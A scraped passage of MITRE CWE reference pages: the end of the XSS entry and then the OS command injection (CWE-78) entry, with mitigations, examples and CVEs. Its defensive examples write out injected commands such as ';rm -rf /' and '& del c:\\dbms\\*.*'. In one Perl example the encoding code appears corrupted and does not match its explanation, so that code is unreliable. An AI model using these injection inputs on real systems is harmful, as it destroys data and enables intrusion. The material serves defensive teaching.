CAPEC-63	Cross-Site Scripting (XSS)
CAPEC-85	AJAX Footprinting

References

[REF-709]	Jeremiah Grossman, Robert "RSnake" Hansen, Petko "pdp" D. Petkov, Anton Rager and Seth Fogie. "XSS Attacks". Syngress. 2007.
[REF-44]	Michael Howard, David LeBlanc and John Viega. "24 Deadly Sins of Software Security". "Sin 2: Web-Server Related Vulnerabilities (XSS, XSRF, and Response Splitting)." Page 31. McGraw-Hill. 2010.
[REF-44]	Michael Howard, David LeBlanc and John Viega. "24 Deadly Sins of Software Security". "Sin 3: Web-Client Related Vulnerabilities (XSS)." Page 63. McGraw-Hill. 2010.
[REF-712]	"Cross-site scripting". Wikipedia. 2008-08-26. <https://en.wikipedia.org/wiki/Cross-site_scripting>. (URL validated: 2023-04-07)
[REF-7]	Michael Howard and David LeBlanc. "Writing Secure Code". Chapter 13, "Web-Specific Input Issues" Page 413. 2nd Edition. Microsoft Press. 2002-12-04. <https://www.microsoftpressstore.com/store/writing-secure-code-9780735617223>.
[REF-714]	RSnake. "XSS (Cross Site Scripting) Cheat Sheet". <http://ha.ckers.org/xss.html>.
[REF-715]	Microsoft. "Mitigating Cross-site Scripting With HTTP-only Cookies". <https://learn.microsoft.com/en-us/previous-versions//ms533046(v=vs.85)?redirectedfrom=MSDN>. (URL validated: 2023-04-07)
[REF-716]	Mark Curphey, Microsoft. "Anti-XSS 3.0 Beta and CAT.NET Community Technology Preview now Live!". <https://learn.microsoft.com/en-us/archive/blogs/cisg/anti-xss-3-0-beta-and-cat-net-community-technology-preview-now-live>. (URL validated: 2023-04-07)
[REF-45]	OWASP. "OWASP Enterprise Security API (ESAPI) Project". <https://owasp.org/www-project-enterprise-security-api/>. (URL validated: 2025-07-24)
[REF-718]	Ivan Ristic. "XSS Defense HOWTO". <https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/xss-defense-howto/>. (URL validated: 2023-04-07)
[REF-719]	OWASP. "Web Application Firewall". <http://www.owasp.org/index.php/Web_Application_Firewall>.
[REF-720]	Web Application Security Consortium. "Web Application Firewall Evaluation Criteria". <http://projects.webappsec.org/w/page/13246985/Web%20Application%20Firewall%20Evaluation%20Criteria>. (URL validated: 2023-04-07)
[REF-721]	RSnake. "Firefox Implements httpOnly And is Vulnerable to XMLHTTPRequest". 2007-07-19.
[REF-722]	"XMLHttpRequest allows reading HTTPOnly cookies". Mozilla. <https://bugzilla.mozilla.org/show_bug.cgi?id=380418>.
[REF-723]	"Apache Wicket". <http://wicket.apache.org/>.
[REF-724]	OWASP. "XSS (Cross Site Scripting) Prevention Cheat Sheet". <http://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet>.
[REF-725]	OWASP. "DOM based XSS Prevention Cheat Sheet". <http://www.owasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Sheet>.
[REF-726]	Jason Lam. "Top 25 series - Rank 1 - Cross Site Scripting". SANS Software Security Institute. 2010-02-22. <https://www.sans.org/blog/top-25-series-rank-1-cross-site-scripting/>. (URL validated: 2023-04-07)
[REF-62]	Mark Dowd, John McDonald and Justin Schuh. "The Art of Software Security Assessment". Chapter 17, "Cross Site Scripting", Page 1071. 1st Edition. Addison Wesley. 2006.
[REF-956]	Wikipedia. "Samy (computer worm)". <https://en.wikipedia.org/wiki/Samy_(computer_worm)>. (URL validated: 2018-01-16)
[REF-962]	Object Management Group (OMG). "Automated Source Code Security Measure (ASCSM)". ASCSM-CWE-79. 2016-01. <http://www.omg.org/spec/ASCSM/1.0/>.
[REF-1481]	D3FEND. "D3FEND: Application Layer Firewall". <https://d3fend.mitre.org/dao/artifact/d3f:ApplicationLayerFirewall/>. (URL validated: 2025-09-06)
[REF-1482]	D3FEND. "D3FEND: D3-TL Trusted Library". <https://d3fend.mitre.org/technique/d3f:TrustedLibrary/>. (URL validated: 2025-09-06)

Content History

Submissions
Submission Date	Submitter	Organization
2006-07-19 (CWE Draft 3, 2006-07-19)	PLOVER
2006-07-19 (CWE Draft 3, 2006-07-19)
Contributions
Contribution Date	Contributor	Organization
2025-03-10 (CWE 4.17, 2025-04-03)	Abhi Balakrishnan
2025-03-10 (CWE 4.17, 2025-04-03)	Provided diagram to improve CWE usability.
Modifications
Modification Date	Modifier	Organization
2025-12-11 (CWE 4.19, 2025-12-11)	CWE Content Team	MITRE
2025-12-11 (CWE 4.19, 2025-12-11)	updated Applicable_Platforms, Demonstrative_Examples, Relationships
2025-09-09 (CWE 4.18, 2025-09-09)	CWE Content Team	MITRE
2025-09-09 (CWE 4.18, 2025-09-09)	updated Applicable_Platforms, Observed_Examples, Potential_Mitigations, References
2025-04-03 (CWE 4.17, 2025-04-03)	CWE Content Team	MITRE
2025-04-03 (CWE 4.17, 2025-04-03)	updated Alternate_Terms, Common_Consequences, Description, Diagram, Other_Notes
2024-11-19 (CWE 4.16, 2024-11-19)	CWE Content Team	MITRE
2024-11-19 (CWE 4.16, 2024-11-19)	updated Relationships
2024-02-29 (CWE 4.14, 2024-02-29)	CWE Content Team	MITRE
2024-02-29 (CWE 4.14, 2024-02-29)	updated Relationships
2023-06-29	CWE Content Team	MITRE
2023-06-29	updated Mapping_Notes, Relationships
2023-04-27	CWE Content Team	MITRE
2023-04-27	updated References, Relationships, Time_of_Introduction
2023-01-31	CWE Content Team	MITRE
2023-01-31	updated Alternate_Terms, Demonstrative_Examples, Description
2022-10-13	CWE Content Team	MITRE
2022-10-13	updated Background_Details, Observed_Examples
2022-06-28	CWE Content Team	MITRE
2022-06-28	updated Observed_Examples, Relationships
2021-10-28	CWE Content Team	MITRE
2021-10-28	updated Relationships
2021-07-20	CWE Content Team	MITRE
2021-07-20	updated Relationships
2021-03-15	CWE Content Team	MITRE
2021-03-15	updated Demonstrative_Examples, Description
2020-12-10	CWE Content Team	MITRE
2020-12-10	updated Relationships
2020-08-20	CWE Content Team	MITRE
2020-08-20	updated Relationships
2020-06-25	CWE Content Team	MITRE
2020-06-25	updated Observed_Examples, Potential_Mitigations
2020-02-24	CWE Content Team	MITRE
2020-02-24	updated Applicable_Platforms, Potential_Mitigations, Relationships
2019-09-19	CWE Content Team	MITRE
2019-09-19	updated Relationships
2019-01-03	CWE Content Team	MITRE
2019-01-03	updated References, Relationships, Taxonomy_Mappings
2018-03-27	CWE Content Team	MITRE
2018-03-27	updated Alternate_Terms, Demonstrative_Examples, Description, Observed_Examples, References, Relationship_Notes, Relationships
2017-11-08	CWE Content Team	MITRE
2017-11-08	updated Applicable_Platforms, Causal_Nature, Demonstrative_Examples, Enabling_Factors_for_Exploitation, Likelihood_of_Exploit, Modes_of_Introduction, References, Relationships
2017-05-03	CWE Content Team	MITRE
2017-05-03	updated Related_Attack_Patterns, Relationships
2017-01-19	CWE Content Team	MITRE
2017-01-19	updated Related_Attack_Patterns
2015-12-07	CWE Content Team	MITRE
2015-12-07	updated Relationships
2014-07-30	CWE Content Team	MITRE
2014-07-30	updated Relationships, Taxonomy_Mappings
2013-07-17	CWE Content Team	MITRE
2013-07-17	updated Relationships
2012-10-30	CWE Content Team	MITRE
2012-10-30	updated Potential_Mitigations
2012-05-11	CWE Content Team	MITRE
2012-05-11	updated References, Relationships
2011-09-13	CWE Content Team	MITRE
2011-09-13	updated Detection_Factors, Potential_Mitigations
2011-06-27	CWE Content Team	MITRE
2011-06-27	updated Relationships
2011-06-01	CWE Content Team	MITRE
2011-06-01	updated Common_Consequences
2011-03-29	CWE Content Team	MITRE
2011-03-29	updated Demonstrative_Examples, References
2010-09-27	CWE Content Team	MITRE
2010-09-27	updated Potential_Mitigations
2010-06-21	CWE Content Team	MITRE
2010-06-21	updated Common_Consequences, Description, Name, Potential_Mitigations, References, Relationships
2010-04-05	CWE Content Team	MITRE
2010-04-05	updated Description, Potential_Mitigations, Related_Attack_Patterns
2010-02-16	CWE Content Team	MITRE
2010-02-16	updated Applicable_Platforms, Detection_Factors, Potential_Mitigations, References, Relationships, Taxonomy_Mappings
2009-12-28	CWE Content Team	MITRE
2009-12-28	updated Demonstrative_Examples, Description, Detection_Factors, Enabling_Factors_for_Exploitation, Observed_Examples
2009-10-29	CWE Content Team	MITRE
2009-10-29	updated Observed_Examples, Relationships
2009-07-27	CWE Content Team	MITRE
2009-07-27	updated Description
2009-05-27	CWE Content Team	MITRE
2009-05-27	updated Name
2009-03-10	CWE Content Team	MITRE
2009-03-10	updated Potential_Mitigations
2009-01-12	CWE Content Team	MITRE
2009-01-12	updated Alternate_Terms, Applicable_Platforms, Background_Details, Common_Consequences, Demonstrative_Examples, Description, Detection_Factors, Enabling_Factors_for_Exploitation, Name, Observed_Examples, Other_Notes, Potential_Mitigations, References, Relationships
2008-09-08	CWE Content Team	MITRE
2008-09-08	updated Alternate_Terms, Applicable_Platforms, Background_Details, Common_Consequences, Description, Relationships, Other_Notes, References, Taxonomy_Mappings, Weakness_Ordinalities
2008-08-15 (CWE 1.0, 2008-09-09)		Veracode
2008-08-15 (CWE 1.0, 2008-09-09)	Suggested OWASP Top Ten 2004 mapping
2008-07-01 (CWE 1.0, 2008-09-09)	Eric Dalci	Cigital
2008-07-01 (CWE 1.0, 2008-09-09)	updated Time_of_Introduction
Previous Entry Names
Change Date	Previous Entry Name
2008-04-11	Cross-site Scripting (XSS)
2009-01-12	Failure to Sanitize Directives in a Web Page (aka 'Cross-site scripting' (XSS))
2009-05-27	Failure to Preserve Web Page Structure (aka 'Cross-site Scripting')
2010-06-21	Failure to Preserve Web Page Structure ('Cross-site Scripting')

Weakness ID: 78

View customized information:

Description

Extended Description

This weakness can lead to a vulnerability in environments in which the attacker does not have direct access to the operating system, such as in web applications. Alternately, if the weakness occurs in a privileged program, it could allow the attacker to specify commands that normally would not be accessible, or to call alternate commands with privileges that the attacker does not have. The problem is exacerbated if the compromised process does not follow the principle of least privilege, because the attacker-controlled commands may run with special system privileges that increases the amount of damage.

There are at least two subtypes of OS command injection:

The application intends to execute a single, fixed program that is under its own control. It intends to use externally-supplied inputs as arguments to that program. For example, the program might use system("nslookup [HOSTNAME]") to run nslookup and allow the user to supply a HOSTNAME, which is used as an argument. Attackers cannot prevent nslookup from executing. However, if the program does not remove command separators from the HOSTNAME argument, attackers could place the separators into the arguments, which allows them to execute their own program after nslookup has finished executing.
The application accepts an input that it uses to fully select which program to run, as well as which commands to use. The application simply redirects this entire command to the operating system. For example, the program might use "exec([COMMAND])" to execute the [COMMAND] that was supplied by the user. If the COMMAND is under attacker control, then the attacker can execute arbitrary commands or programs. If the command is being executed using functions like exec() and CreateProcess(), the attacker might not be able to combine multiple commands together in the same line.

From a weakness standpoint, these variants represent distinct programmer errors. In the first variant, the programmer clearly intends that input from untrusted parties will be part of the arguments in the command to be executed. In the second variant, the programmer does not intend for the command to be accessible to any untrusted party, but the programmer probably has not accounted for alternate ways in which malicious attackers can provide input.

Alternate Terms

Shell injection
Shell metacharacters
OS Command Injection

Common Consequences

Impact

Details

Execute Unauthorized Code or Commands; DoS: Crash, Exit, or Restart; Read Files or Directories; Modify Files or Directories; Read Application Data; Modify Application Data; Hide Activities

Scope: Confidentiality, Integrity, Availability, Non-Repudiation

Attackers could execute unauthorized operating system commands, which could then be used to disable the product, or read and modify data for which the attacker does not have permissions to access directly. Since the targeted application is directly executing the commands instead of the attacker, any malicious activities may appear to come from the application or the application's owner.

Potential Mitigations

Phase(s)	Mitigation
Architecture and Design	If at all possible, use library calls rather than external processes to recreate the desired functionality.
Architecture and Design; Operation	Strategy: Sandbox or Jail Run the code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software. OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations. This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise. Be careful to avoid CWE-243 and other weaknesses related to jails. Effectiveness: Limited Note: The effectiveness of this mitigation depends on the prevention capabilities of the specific sandbox or jail being used and might only help to reduce the scope of an attack, such as restricting the attacker to certain system calls or limiting the portion of the file system that can be accessed.
Architecture and Design	Strategy: Attack Surface Reduction For any data that will be used to generate a command to be executed, keep as much of that data out of external control as possible. For example, in web applications, this may require storing the data locally in the session's state instead of sending it out to the client in a hidden form field.
Architecture and Design	For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.
Architecture and Design	Strategy: Libraries or Frameworks Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid. For example, consider using the ESAPI Encoding control [REF-45] or a similar tool, library, or framework. These will help the programmer encode outputs in a manner less prone to error.
Implementation	Strategy: Output Encoding While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88).
Implementation	If the program to be executed allows arguments to be specified within an input file or from standard input, then consider using that mode to pass arguments instead of the command line.
Architecture and Design	Strategy: Parameterization If available, use structured mechanisms that automatically enforce the separation between data and code. These mechanisms may be able to provide the relevant quoting, encoding, and validation automatically, instead of relying on the developer to provide this capability at every point where output is generated. Some languages offer multiple functions that can be used to invoke commands. Where possible, identify any function that invokes a command shell using a single string, and replace it with a function that requires individual arguments. These functions typically perform appropriate quoting and filtering of arguments. For example, in C, the system() function accepts a string that contains the entire command to be executed, whereas execl(), execve(), and others require an array of strings, one for each argument. In Windows, CreateProcess() only accepts one command at a time. In Perl, if system() is provided with an array of arguments, then it will quote each of the arguments.
Implementation	Strategy: Input Validation Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. When constructing OS command strings, use stringent allowlists that limit the character set based on the expected value of the parameter in the request. This will indirectly limit the scope of an attack, but this technique is less important than proper output encoding and escaping. Note that proper output encoding, escaping, and quoting is the most effective solution for preventing OS command injection, although input validation may provide some defense-in-depth. This is because it effectively limits what will appear in output. Input validation will not always prevent OS command injection, especially if you are required to support free-form text fields that could contain arbitrary characters. For example, when invoking a mail program, you might need to allow the subject field to contain otherwise-dangerous inputs like ";" and ">" characters, which would need to be escaped or otherwise handled. In this case, stripping the character might reduce the risk of OS command injection, but it would produce incorrect behavior because the subject field would not be recorded as the user intended. This might seem to be a minor inconvenience, but it could be more important when the program relies on well-structured subject lines in order to pass messages to other components. Even if you make a mistake in your validation (such as forgetting one out of 100 input fields), appropriate encoding is still likely to protect you from injection-based attacks. As long as it is not done in isolation, input validation is still a useful technique, since it may significantly reduce your attack surface, allow you to detect some attacks, and provide other security benefits that proper encoding does not address.
Architecture and Design	Strategy: Enforcement by Conversion When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs.
Operation	Strategy: Compilation or Build Hardening Run the code in an environment that performs automatic taint propagation and prevents any command execution that uses tainted variables, such as Perl's "-T" switch. This will force the program to perform validation steps that remove the taint, although you must be careful to correctly validate your inputs so that you do not accidentally mark dangerous inputs as untainted (see CWE-183 and CWE-184).
Operation	Strategy: Environment Hardening Run the code in an environment that performs automatic taint propagation and prevents any command execution that uses tainted variables, such as Perl's "-T" switch. This will force the program to perform validation steps that remove the taint, although you must be careful to correctly validate your inputs so that you do not accidentally mark dangerous inputs as untainted (see CWE-183 and CWE-184).
Implementation	Ensure that error messages only contain minimal details that are useful to the intended audience and no one else. The messages need to strike the balance between being too cryptic (which can confuse users) or being too detailed (which may reveal more than intended). The messages should not reveal the methods that were used to determine the error. Attackers can use detailed information to refine or optimize their original attack, thereby increasing their chances of success. If errors must be captured in some detail, record them in log messages, but consider what could occur if the log messages can be viewed by attackers. Highly sensitive information such as passwords should never be saved to log files. Avoid inconsistent messaging that might accidentally tip off an attacker about internal state, such as whether a user account exists or not. In the context of OS Command Injection, error information passed back to the user might reveal whether an OS command is being executed and possibly which command is being used.
Operation	Strategy: Sandbox or Jail Use runtime policy enforcement to create an allowlist of allowable commands, then prevent use of any command that does not appear in the allowlist. Technologies such as AppArmor are available to do this.
Operation	Strategy: Firewall Use an application firewall that can detect attacks against this weakness. It can be beneficial in cases in which the code cannot be fixed (because it is controlled by a third party), as an emergency prevention measure while more comprehensive software assurance measures are applied, or to provide defense in depth [REF-1481]. Effectiveness: Moderate Note: An application firewall might not cover all possible input vectors. In addition, attack techniques might be available to bypass the protection mechanism, such as using malformed inputs that can still be processed by the component that receives those inputs. Depending on functionality, an application firewall might inadvertently reject or modify legitimate requests. Finally, some manual effort may be required for customization.
Architecture and Design; Operation	Strategy: Environment Hardening Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations.
Operation; Implementation	Strategy: Environment Hardening When using PHP, configure the application so that it does not use register_globals. During implementation, develop the application so that it does not rely on this feature, but be wary of implementing a register_globals emulation that is subject to weaknesses such as CWE-95, CWE-621, and similar issues.

Relationships

Relevant to the view "Research Concepts" (View-1000)

Nature	Type	ID	Name
ChildOf	Class - a weakness that is described in a very abstract fashion, typically independent of any specific language or technology. More specific than a Pillar Weakness, but more general than a Base Weakness. Class level weaknesses typically describe issues in terms of 1 or 2 of the following dimensions: behavior, property, and resource.	77	Improper Neutralization of Special Elements used in a Command ('Command Injection')
CanAlsoBe	Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource.	88	Improper Neutralization of Argument Delimiters in a Command ('Argument Injection')
CanFollow	Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource.	184	Incomplete List of Disallowed Inputs

Relevant to the view "Software Development" (View-699)

Nature	Type	ID	Name
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	137	Data Neutralization Issues

Relevant to the view "Weaknesses for Simplified Mapping of Published Vulnerabilities" (View-1003)

Nature	Type	ID	Name
ChildOf	Class - a weakness that is described in a very abstract fashion, typically independent of any specific language or technology. More specific than a Pillar Weakness, but more general than a Base Weakness. Class level weaknesses typically describe issues in terms of 1 or 2 of the following dimensions: behavior, property, and resource.	74	Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')

Relevant to the view "Architectural Concepts" (View-1008)

Nature	Type	ID	Name
MemberOf	Category - a CWE entry that contains a set of other entries that share a common characteristic.	1019	Validate Inputs

Relevant to the view "CISQ Quality Measures (2020)" (View-1305)

Nature	Type	ID	Name
ChildOf	Class - a weakness that is described in a very abstract fashion, typically independent of any specific language or technology. More specific than a Pillar Weakness, but more general than a Base Weakness. Class level weaknesses typically describe issues in terms of 1 or 2 of the following dimensions: behavior, property, and resource.	77	Improper Neutralization of Special Elements used in a Command ('Command Injection')

Relevant to the view "CISQ Data Protection Measures" (View-1340)

Nature	Type	ID	Name
ChildOf	Class - a weakness that is described in a very abstract fashion, typically independent of any specific language or technology. More specific than a Pillar Weakness, but more general than a Base Weakness. Class level weaknesses typically describe issues in terms of 1 or 2 of the following dimensions: behavior, property, and resource.	77	Improper Neutralization of Special Elements used in a Command ('Command Injection')

Modes Of Introduction

Phase	Note
Implementation	REALIZATION: This weakness is caused during implementation of an architectural security tactic.

Applicable Platforms

Languages	Class: Not Language-Specific (Undetermined Prevalence)
Technologies	Class: Not Technology-Specific (Undetermined Prevalence) AI/ML (Undetermined Prevalence) Web Server (Often Prevalent)

Likelihood Of Exploit

High

Demonstrative Examples

Example 1

This example code intends to take the name of a user and list the contents of that user's home directory. It is subject to the first variant of OS command injection.

(bad code)

Example Language: PHP

$userName = $_POST["user"];
$command = 'ls -l /home/' . $userName;
system($command);

The $userName variable is not checked for malicious input. An attacker could set the $userName variable to an arbitrary OS command such as:

(attack code)

;rm -rf /

Which would result in $command being:

(result)

ls -l /home/;rm -rf /

Since the semi-colon is a command separator in Unix, the OS would first execute the ls command, then the rm command, deleting the entire file system.

Also note that this example code is vulnerable to Path Traversal (CWE-22) and Untrusted Search Path (CWE-426) attacks.

Example 2

The following simple program accepts a filename as a command line argument and displays the contents of the file back to the user. The program is installed setuid root because it is intended for use as a learning tool to allow system administrators in-training to inspect privileged system files without giving them the ability to modify them or damage the system.

(bad code)

Example Language: C

int main(int argc, char** argv) {

char cmd[CMD_MAX] = "/usr/bin/cat ";
strcat(cmd, argv[1]);
system(cmd);

}

Because the program runs with root privileges, the call to system() also executes with root privileges. If a user specifies a standard filename, the call works as expected. However, if an attacker passes a string of the form ";rm -rf /", then the call to system() fails to execute cat due to a lack of arguments and then plows on to recursively delete the contents of the root partition.

Note that if argv[1] is a very long argument, then this issue might also be subject to a buffer overflow (CWE-120).

Example 3

This example is a web application that intends to perform a DNS lookup of a user-supplied domain name. It is subject to the first variant of OS command injection.

(bad code)

Example Language: Perl

use CGI qw(:standard);
$name = param('name');
$nslookup = "/path/to/nslookup";
print header;
if (open($fh, "$nslookup $name|")) {

while (<$fh>) {

print escapeHTML($_);
print "<br>\n";

}
close($fh);

}

Suppose an attacker provides a domain name like this:

(attack code)

cwe.mitre.org%20%3B%20/bin/ls%20-l

The "%3B" sequence decodes to the ";" character, and the %20 decodes to a space. The open() statement would then process a string like this:

(result)

/path/to/nslookup cwe.mitre.org ; /bin/ls -l

As a result, the attacker executes the "/bin/ls -l" command and gets a list of all the files in the program's working directory. The input could be replaced with much more dangerous commands, such as installing a malicious program on the server.

Example 4

The example below reads the name of a shell script to execute from the system properties. It is subject to the second variant of OS command injection.

(bad code)

Example Language: Java

String script = System.getProperty("SCRIPTNAME");
if (script != null)

System.exec(script);

If an attacker has control over this property, then they could modify the property to point to a dangerous program.

Example 5

In the example below, a method is used to transform geographic coordinates from latitude and longitude format to UTM format. The method gets the input coordinates from a user through a HTTP request and executes a program local to the application server that performs the transformation. The method passes the latitude and longitude coordinates as a command-line option to the external program and will perform some processing to retrieve the results of the transformation and return the resulting UTM coordinates.

(bad code)

Example Language: Java

public String coordinateTransformLatLonToUTM(String coordinates)
{

String utmCoords = null;
try {

String latlonCoords = coordinates;
Runtime rt = Runtime.getRuntime();
Process exec = rt.exec("cmd.exe /C latlon2utm.exe -" + latlonCoords);
// process results of coordinate transform

// ...

}
catch(Exception e) {...}
return utmCoords;

}

However, the method does not verify that the contents of the coordinates input parameter includes only correctly-formatted latitude and longitude coordinates. If the input coordinates were not validated prior to the call to this method, a malicious user could execute another program local to the application server by appending '&' followed by the command for another program to the end of the coordinate string. The '&' instructs the Windows operating system to execute another program.

Example 6

The following code is from an administrative web application designed to allow users to kick off a backup of an Oracle database using a batch-file wrapper around the rman utility and then run a cleanup.bat script to delete some temporary files. The script rmanDB.bat accepts a single command line parameter, which specifies what type of backup to perform. Because access to the database is restricted, the application runs the backup as a privileged user.

(bad code)

Example Language: Java

...
String btype = request.getParameter("backuptype");
String cmd = new String("cmd.exe /K \"

c:\\util\\rmanDB.bat "
+btype+
"&&c:\\utl\\cleanup.bat\"")

System.Runtime.getRuntime().exec(cmd);
...

The problem here is that the program does not do any validation on the backuptype parameter read from the user. Typically the Runtime.exec() function will not execute multiple commands, but in this case the program first runs the cmd.exe shell in order to run multiple commands with a single call to Runtime.exec(). Once the shell is invoked, it will happily execute multiple commands separated by two ampersands. If an attacker passes a string of the form "& del c:\\dbms\\*.*", then the application will execute this command along with the others specified by the program. Because of the nature of the application, it runs with the privileges necessary to interact with the database, which means whatever command the attacker injects will run with those privileges as well.

Example 7

The following code is a wrapper around the UNIX command cat which prints the contents of a file to standard out. It is also injectable:

(bad code)

Example Language: C

#include <stdio.h>
#include <unistd.h>

int main(int argc, char **argv) {

char cat[] = "cat ";
char *command;
size_t commandLength;

commandLength = strlen(cat) + strlen(argv[1]) + 1;
command = (char *) malloc(commandLength);
strncpy(command, cat, commandLength);
strncat(command, argv[1], (commandLength - strlen(cat)) );

system(command);
return (0);

}

Used normally, the output is simply the contents of the file requested, such as Story.txt:

(informative)

./catWrapper Story.txt

(result)

When last we left our heroes...

However, if the provided argument includes a semicolon and another command, such as:

(attack code)

Story.txt; ls

Then the "ls" command is executed by catWrapper with no complaint:

(result)

./catWrapper Story.txt; ls

Two commands would then be executed: catWrapper, then ls. The result might look like:

(result)

When last we left our heroes...
Story.txt
SensitiveFile.txt
PrivateData.db
a.out*

If catWrapper had been set to have a higher privilege level than the standard user, arbitrary commands could be executed with that higher privilege.

Example 8

This example takes user input, passes it through an encoding scheme, then lists the contents of the user's home directory based on the user name.

(bad code)

Example Language: Perl

sub GetUntrustedInput {

return($ARGV[0]);

}

sub encode {

my($str) = @_;
$str =~ s/\&/\&/gs;
$str =~ s/\"/\"/gs;
$str =~ s/\'/\'/gs;
$str =~ s/\</\</gs;
$str =~ s/\>/\>/gs;
return($str);

}

sub doit {

my $uname = encode(GetUntrustedInput("username"));
print "<b>Welcome, $uname!</b><p>\n";
system("cd /home/$uname; /bin/ls -l");

}

The programmer attempts to encode dangerous characters, however the denylist for encoding is incomplete (CWE-184) and an attacker can still pass a semicolon, resulting in a chain with OS command injection (CWE-78).

Additionally, the encoding routine is used inappropriately with command execution. An attacker doesn't even need to insert their own semicolon. The attacker can instead leverage the encoding routine to provide the semicolon to separate the commands. If an attacker supplies a string of the form:

(attack code)

' pwd

then the program will encode the apostrophe and insert the semicolon, which functions as a command separator when passed to the system function. This allows the attacker to complete the command injection.

Selected Observed Examples

Reference	Description
CVE-2024-53899	Virtual environment builder does not correctly quote "magic" template strings, allowing OS command injection using a directory whose name contains shell metacharacters
CVE-2025-44844	file upload functionality in wireless access point allows OS command injection via shell metacharacters through the file name in a Content-Disposition header
CVE-2024-6091	Chain: AI agent platform does not restrict pathnames containing internal "/./" sequences (CWE-55), leading to an incomplete denylist (CWE-184) that does not prevent OS command injection (CWE-78)
CVE-2024-41316	Lua application in network device allows OS command injection into os.execute()
CVE-2024-44335	Chain: filter only checks for some shell-injection characters (CWE-184), enabling OS command injection (CWE-78)
CVE-2024-52803	Platform for handling LLMs has OS command injection during training due to insecure use of the "Popen" function
CVE-2020-10987	OS command injection in Wi-Fi router, as exploited in the wild per CISA KEV.
CVE-2020-10221	Template functionality in network configuration management tool allows OS command injection, as exploited in the wild per CISA KEV.
CVE-2020-9054	Chain: improper input validation (CWE-20) in username parameter, leading to OS command injection (CWE-78), as exploited in the wild per CISA KEV.
CVE-1999-0067	Canonical example of OS command injection. CGI program does not neutralize "\|" metacharacter when invoking a phonebook program.
CVE-2001-1246	Language interpreter's mail function accepts another argument that is concatenated to a string used in a dangerous popen() call. Since there is no neutralization of this argument, both OS Command Injection (CWE-78) and Argument Injection (CWE-88) are possible.
CVE-2002-0061	Web server allows command execution using "\|" (pipe) character.
CVE-2003-0041	FTP client does not filter "\|" from filenames returned by the server, allowing for OS command injection.
CVE-2008-2575	Shell metacharacters in a filename in a ZIP archive
CVE-2002-1898	Shell metacharacters in a telnet:// link are not properly handled when the launching application processes the link.
CVE-2008-4304	OS command injection through environment variable.
CVE-2008-4796	OS command injection through https:// URLs
CVE-2007-3572	Chain: incomplete denylist for OS command injection
CVE-2012-1988	Product allows remote users to execute arbitrary commands by creating a file whose pathname contains shell metacharacters.

Weakness Ordinalities

Ordinality	Description
Primary	(where the weakness exists independent of other weaknesses)
Resultant	(where the weakness is typically related to the presence of some other weaknesses)

Detection Methods

Method	Details
Automated Static Analysis	This weakness can often be detected using automated static analysis tools. Many modern tools use data flow analysis or constraint-based techniques to minimize the number of false positives. Automated static analysis might not be able to recognize when proper input validation is being performed, leading to false positives - i.e., warnings that do not have any security consequences or require any code changes. Automated static analysis might not be able to detect the usage of custom API functions or third-party libraries that indirectly invoke OS commands, leading to false negatives - especially if the API/library code is not available for analysis. Note:This is not a perfect solution, since 100% accuracy and coverage are not feasible.
Automated Dynamic Analysis	This weakness can be detected using dynamic tools and techniques that interact with the product using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The product's operation may slow down, but it should not become unstable, crash, or generate incorrect results. Effectiveness: Moderate
Manual Static Analysis	Since this weakness does not typically appear frequently within a single software package, manual white box techniques may be able to provide sufficient code coverage and reduction of false positives if all potentially-vulnerable operations can be assessed within limited time constraints. Effectiveness: High
Automated Static Analysis - Binary or Bytecode	According to SOAR [REF-1479], the following detection techniques may be useful: Highly cost effective: Bytecode Weakness Analysis - including disassembler + source code weakness analysis Binary Weakness Analysis - including disassembler + source code weakness analysis Effectiveness: High
Dynamic Analysis with Automated Results Interpretation	According to SOAR [REF-1479], the following detection techniques may be useful: Cost effective for partial coverage: Web Application Scanner Web Services Scanner Database Scanners Effectiveness: SOAR Partial
